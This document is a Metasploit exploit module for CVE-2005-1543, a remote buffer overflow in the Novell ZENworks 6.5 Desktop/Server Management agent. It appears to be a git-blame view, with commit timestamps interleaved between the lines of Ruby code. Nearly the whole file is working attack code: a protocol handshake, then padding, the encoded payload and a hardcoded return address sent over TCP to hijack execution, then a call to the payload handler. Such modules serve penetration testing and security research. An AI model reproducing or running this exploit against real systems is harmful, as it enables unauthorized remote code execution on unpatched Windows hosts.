2007-02-18 00:10:39 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2005-11-27 07:26:58 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
2005-11-27 07:26:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2005-11-27 07:26:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a heap overflow in the Novell ZENworks
|
|
|
|
Desktop Management agent. This vulnerability was discovered
|
|
|
|
by Alex Wheeler.
|
|
|
|
},
|
|
|
|
'Author' => [ 'Unknown' ],
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2005-1543'],
|
|
|
|
[ 'OSVDB', '16698'],
|
|
|
|
[ 'BID', '13678'],
|
2005-11-27 07:26:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 32767,
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
2013-10-09 02:41:50 +00:00
|
|
|
'Platform' => %w{ win },
|
2013-08-30 21:28:54 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[
|
|
|
|
'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x10002e06,
|
|
|
|
},
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 19 2005',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
2005-11-27 07:26:58 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
|
|
|
connect
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
|
|
|
|
print_status("Sending version identification")
|
|
|
|
sock.put(hello)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
|
|
|
|
ident = sock.get_once
|
|
|
|
if !(ident and ident.length == 16)
|
|
|
|
print_error("Failed to receive agent version identification")
|
|
|
|
return
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Received agent version identification")
|
|
|
|
print_status("Sending client acknowledgement")
|
|
|
|
sock.put("\x00\x01")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Stack buffer overflow in ZenRem32.exe / ZENworks Server Management
|
|
|
|
sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
ack = sock.get_once
|
|
|
|
sock.put("\x00\x01")
|
|
|
|
sock.put("\x00\x02")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Sending final payload")
|
|
|
|
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Overflow request sent, sleeping for four seconds")
|
|
|
|
select(nil,nil,nil,4)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|